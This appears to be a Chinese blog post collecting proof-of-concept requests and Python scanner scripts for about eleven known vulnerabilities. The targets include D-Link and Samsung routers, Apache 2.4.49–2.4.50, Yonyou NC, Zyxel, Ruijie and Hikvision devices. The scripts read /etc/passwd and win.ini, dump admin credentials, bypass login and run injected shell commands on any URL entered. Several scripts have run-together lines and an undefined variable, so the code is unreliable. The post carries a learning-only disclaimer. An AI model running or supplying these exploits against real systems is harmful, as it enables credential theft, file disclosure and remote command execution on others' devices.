声明:

此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明

D-Link-DIR路由器 账号密码信息泄露漏洞

poc:

/getcfg.php
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a

页面原型:

漏洞检测:

输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图

用户名以及密码就出来了​

脚本参考如下:

import requestsurl=input("输入url\n>>>>>>>>")+"/getcfg.php"
header={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
"Cookie":"",
"X-Forwarded-For":"127.0.0.1"}data = ("SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a")response=requests.post(url,data=data,headers=header,verify=False,timeout=10)print(response.text)
if  "DEVICE.ACCOUNT" in response.text and response.status_code == 200:print("[" + url + "]" + "[===存在漏洞===]")
else:print("["+url+"]"+"[不存在漏洞]")

CVE-2021-41773/42013 Apache HTTP Server任意文件读取漏洞

POC:

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

影响版本:
​Apache/2.4.49-2.4.50

页面原型:

漏洞检测:

检测脚本示例:

import urllib.request
from requests.packages.urllib3.exceptions import InsecureRequestWarning
​
url = input("输入测试地址\n>>>") + "/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:request = urllib.request.Request(url=url, headers=header)response = urllib.request.urlopen(request, timeout=10)html = response.read().decode('utf-8')if "root" in html or "nologin" in html:print(html)print("[" + url + "]" + "[===存在Apache HTTP Server任意文件读取漏洞===]")else:print("[" + url + "]" + "[不存在Apache HTTP Server任意文件读取漏洞]")
except Exception as e:print("[" + target_url + "]" + "[不存在漏洞]", format(e))​

用友ERP-NC 目录遍历漏洞检测

POC​

/NCFindWeb?service=IPreAlertConfigService&filename=​

页面原型:

漏洞检测:

此处展示的是存在的文件,可以直接访问,查阅代码

脚本示例:

import requestsurl = input("输入测试地址\n>>>") + "/NCFindWeb?service=IPreAlertConfigService&filename="
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:response = requests.get(url=url, headers=header, verify=False, timeout=10)if "error.jsp" in response.text or "helpmain.jsp" in response.text or "login.jsp" in response.text and response.status_code == 200:print(response.text)print("[" + url + "]" + "[===存在用友 ERP-NC 目录遍历漏洞漏洞===]")else:print("[" + url + "]" + "[不存在用友 ERP-NC 目录遍历漏洞漏洞]")
except Exception as e:print("[" + target_url + "]" + "[不存在漏洞]", format(e))

360天擎信息泄露漏洞检测

POC

/api/dbstat/gettablessize​

页面原型:

漏洞检测:

脚本示例:

import requestsurl = input("输入测试地址\n>>>") + "/api/dbstat/gettablessize"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:response = requests.get(url=url, headers=header, verify=False, timeout=10)if "schema_name" in response.text or "table_name" in response.text or "table_size" in response.text and response.status_code == 200:print(response.text)print("[" + url + "]" + "[===存在360天擎信息泄露漏漏洞===]")else:print("[" + url + "]" + "[不存在360天擎信息泄露漏漏洞]")
except Exception as e:print("[" + url + "]" + "[不存在漏洞]", format(e))

Zyxel NBG2105身份验证绕过漏洞

POC

/login_ok.htm

直接访问此接口即可

页面原型:

漏洞检测:

脚本示例:

​import requestsurl = input("输入测试地址\n>>>") +"/login_ok.htm"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:response = requests.get(url=url, headers=header, verify=False, timeout=10)if "ZyXEL" in response.text and response.status_code == 200:print("[" + url + "]" + "[===存在Zyxel NBG2105身份验证绕过漏洞===]")else:print("[" + url + "]" + "[不存在Zyxel NBG2105身份验证绕过漏洞]")
except Exception as e:print("[" + url + "]" + "[不存在漏洞]", format(e))

三星WLAN AP WEA453e路由器远程命令执行漏洞

POC

/(download)/tmp/a.txt
​​
command1=shell:cat /etc/passwd| dd of=/tmp/a.txt

页面原型:

漏洞检测:
输入任意用户名密码,点击登陆,而后拦截数据包伪造数据如下

脚本示例:

import requestsurl = input("输入测试地址\n>>>")+ "/(download)/tmp/a.txt"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
data = ("command1=shell:cat /etc/passwd| dd of=/tmp/a.txt")
try:response = requests.post(url=url, headers=header, data=data, verify=False, timeout=10)if "bin" in response.text or "bash" in response.text or "nologin" in response.text and response.status_code == 200:print(response.text)print("[" + url + "]" + "[===存在三星WLAN AP WEA453e路由器远程命令执行漏洞===]")else:print("[" + url + "]" + "[不存在三星WLAN AP WEA453e路由器远程命令执行漏洞]")
except Exception as e:print("[" + url + "]" + "[不存在漏洞]", format(e))

三星路由器本地包含漏洞

POC

/(download)/etc/passwd​

页面原型:

漏洞检测:

脚本示例:

import requestsurl = input("输入测试地址\n>>>") + "/(download)/etc/passwd"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:response = requests.get(url=url, headers=header, verify=False, timeout=10)if "bin" in response.text or "bash" in response.text or "nologin" in response.text and response.status_code == 200:print(response.text)print("[" + url + "]" + "[===存在三星路由器本地包含漏洞===]")else:print("[" + url + "]" + "[不存在三星路由器本地包含漏洞]")
except Exception as e:print("[" + target_url + "]" + "[不存在漏洞]", format(e))

存在好视通视频会议平台任意文件下载漏洞

POC

/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

页面原型:

漏洞检测:

脚本示例:​

import requestsurl = input("输入测试地址\n>>>") + "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:response = requests.get(url=url, headers=header, verify=False, timeout=10)if "for 16-bit app support" in response.text or "MAPI=1" in response.text and response.status_code == 200:print(response.text)print("[" + url + "]" + "[===存在好视通视频会议平台任意文件下载漏洞===]")else:print("[" + url + "]" + "[不存在好视通视频会议平台任意文件下载漏洞]")
except Exception as e:print("[" + url + "]" + "[不存在漏洞]", format(e))

锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞

POC

f12查看源码

页面原型:

漏洞检测:

脚本示例:

import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningurl = input("输入测试地址\n>>>")
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=url, headers=header, verify=False, timeout=5)if "super_admin" in response.text or "auth_method" in response.text and response.status_code == 200:name = re.findall('"name":\"(.*)\"', response.text)print(name)print("[" + url + "]" + "[===存在锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞===]")else:print("[" + url + "]" + "[不存在锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞]")
except Exception as e:print("[" + url + "]" + "[不存在漏洞]", format(e))

D-Link DSL-28881A 远程命令执行漏洞

POC

需要先登陆一次,失败后才可以
/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig

页面原型:

漏洞检测:
首先输入任意用户名密码,待提示登陆失败后继续进行下一步

而后访问漏洞页面

/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig

脚本示例:

import requestsurl=input("输入测试地址\n>>>")
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
data = ("username=admin&password=a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3")
try:response = requests.post(url=url, data=data, headers=header, verify=False, timeout=10)url = url + "/cgi-bin/execute_cmd.cgi?timestamp=test&cmd=ifconfig"response1 = requests.get(url=url, headers=header, verify=False, timeout=10)if "Link encap" in response1.text or "br0" in response1.text or "Mask" in response1.text and response1.status_code == 200:print(response1.text)print("[" + url + "]" + "[===存在D-Link DSL-28881A 远程命令执行漏洞===]")else:print("[" + url + "]" + "[不存在D-Link DSL-28881A 远程命令执行漏洞]")
except Exception as e:print("[" + url + "]" + "[不存在漏洞]", format(e))

HIKVISION 视频编码设备接入网关 任意文件下载漏洞

POC

/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php

页面原型:

漏洞检测:

脚本示例:

import requestsurl=input("输入测试地址\n>>>")
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36","X-Forwarded-For": "127.0.0.1"}
try:response = requests.post(url=url, headers=header, verify=False, timeout=10)url = url + "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php"response = requests.get(url=url, headers=header, verify=False, timeout=10)if "<?php" in response.text or "$file_name" in response.text and response.status_code == 200:print(response.text)print("[" + url + "]" + "[===存在HIKVISION 视频编码设备接入网关 任意文件下载漏洞===]")else:print("[" + url + "]" + "[不存在HIKVISION 视频编码设备接入网关 任意文件下载漏洞]")
except Exception as e:print("[" + url + "]" + "[不存在漏洞]", format(e))

本网站发布的项目中涉及的任何脚本,仅用于测试和学习研究,禁止用于商业用途,不能保证其合法性、准确性、完整性及有效性,请根据实际情况自行判断。
本网站对任何脚本及工具问题概不负责,包括但不限于由任何脚本错误导致的任何损失或损害。
间接使用本站中的任何工具及技术,包括但不限于漏洞挖掘或在某些行为违反国家/地区法律​或相关法规的情况下进行传播,本网站对于由此引起的任何隐私泄漏或其他后果概不负责。

​本网站保留随时更改或补充此免责声明的权利。一旦访问本网站项目,则视为
您已接受此免责声明。
您在本声明未发出之时点使用或者访问了该网站,则规为己接受此声明,请仔细阅读。

2021年漏洞小结-手工自检篇相关推荐

  1. 逻辑漏洞小结之SRC篇

    最近在挖各大src,主要以逻辑漏洞为主,想着总结一下我所知道的一些逻辑漏洞分享一下以及举部分实际的案例展示一下,方便大家理解. 主要从两个方面看,业务方面与漏洞方面.(接下来就从拿到网站的挖掘步骤进行 ...

  2. 2021考研——复习规划(英语篇)

    注:本篇文章所有内容均来自我的知乎专栏:2021考研-复习规划(英语篇)- Mr.鹏的文章 ,著作权归本人所有. 2021考研--复习规划(英语篇) 文章目录 前言 一.考试分析 题型分布: 试卷分析 ...

  3. WACV 2021 论文大盘点-医学影像篇

    本文对WACV 2021中医学相关论文进行总结,包含医学图像分类.分割.着色.合成以及智能诊断报告生成. 共计 8 篇,如有遗漏,欢迎补充. 下载包含这些论文的 WACV 2021 所有论文,请点击: ...

  4. 推广知识小结(名词篇CPA、CPS、CPC、CPM、CPT、CPD)

    推广知识小结(名词篇) 一.CPC 二.CPM 三.CPA 四.CPS 五.CPT 六.CPD 一.CPC CPC,这一种推广模式全称为:Cost Per Click.这一种推广方式是按照点击量来进行 ...

  5. 90.网络安全渗透测试—[常规漏洞挖掘与利用篇6]—[文件包含-PHP封装伪协议详解实战示例]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含-PHP封装伪协议简介 1.php内置封装协议 2.data://命令执行-伪协议 3.zip:// ...

  6. 2021考研——复习规划(408篇)

    注:本篇文章所有内容均来自我的知乎专栏:2021考研-复习规划(英语篇)- Mr.鹏的文章 ,著作权归本人所有. 2021考研--复习规划(408篇) 文章目录 前言 一.考试分析 1.考察学科范围 ...

  7. 2021 HW 漏洞清单汇总 ( 附 poc )

    2021 HW 漏洞清单汇总 2021.4.8--4.22 披露时间         涉及商家/产品        漏洞描述 2021/04/08        启明星辰天清汉马USG防火墙存在逻辑缺 ...

  8. 2021最新Java面经整理 | 数据库篇(一)MySQL

    2021最新Java面经整理 | 数据库篇(一)MySQL 目录 一.基础 1.数据库范式 2.视图 3.游标 4.存储过程与函数 5.触发器 6.常用问题 二.事务 1.事务四大特性(ACID) 2 ...

  9. SQL注入漏洞全接触--入门篇

    随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进 ...

最新文章

  1. PySCF :基于Python的化学模拟框架
  2. Android 中文API (91) —— GestureDetector
  3. LG P4198 楼房重建(线段树)
  4. 理发店收银系统php,【毕业论文】基于php+mysql美发店收银系统设计与实现.doc
  5. 【重难点】【Java集合 02】Set、List、Map 的区别、常见的线程安全的集合类、Collection 为什么只能在 Iterator 中删除元素
  6. 米勒机会信托或将通过GBTC投资比特币
  7. JavaScript的Math对象使用(1)
  8. 使用内存文件映射MappedByteBuffer读超大文件可能会遇到的问题
  9. Daily Scrum 12.13
  10. Consul注册中心删除某个服务
  11. c语言餐桌游戏,教会你这十款酒桌游戏,让你在朋友圈稳站“C”位!
  12. Netty(四十一) - 心跳(heartbeat)源码剖析
  13. physx中ray不碰撞某些物体的方法
  14. AST混淆实战|仿obfuscator混淆控制流平坦化(超详细版)
  15. 计算机常用术语cae是指,《计算机文化基础》练习题
  16. excel函数公式大全,最常用的6个公式
  17. 制度化规范化标准化精细化_何为规范化、标准化、精细化管理
  18. npm系列:package.json
  19. 青藤:容器安全成熟度验证标准之3个层级,12大场景,100+ Checklist
  20. 计算机对中药学作用,计算中药学

热门文章

  1. 打折算法 Java_JAVA算法策略模式之商品打折 满x送x
  2. 职业高中学计算机高考后能报什么,「新高考」新高考选哪些科目可以报计算机专业?高中生如何提分?...
  3. 第087讲 http协议深度剖析④-http响应详解(文件下载)
  4. 消息队列——ActiceMQ
  5. 湖北校园网PC端拨号算法逆向
  6. Android预装第三方app
  7. 复工复产,利用Python爬虫爬取火车票信息
  8. windows下将Nginx注册为服务
  9. Vue禁用button
  10. SQL命令之FROM子句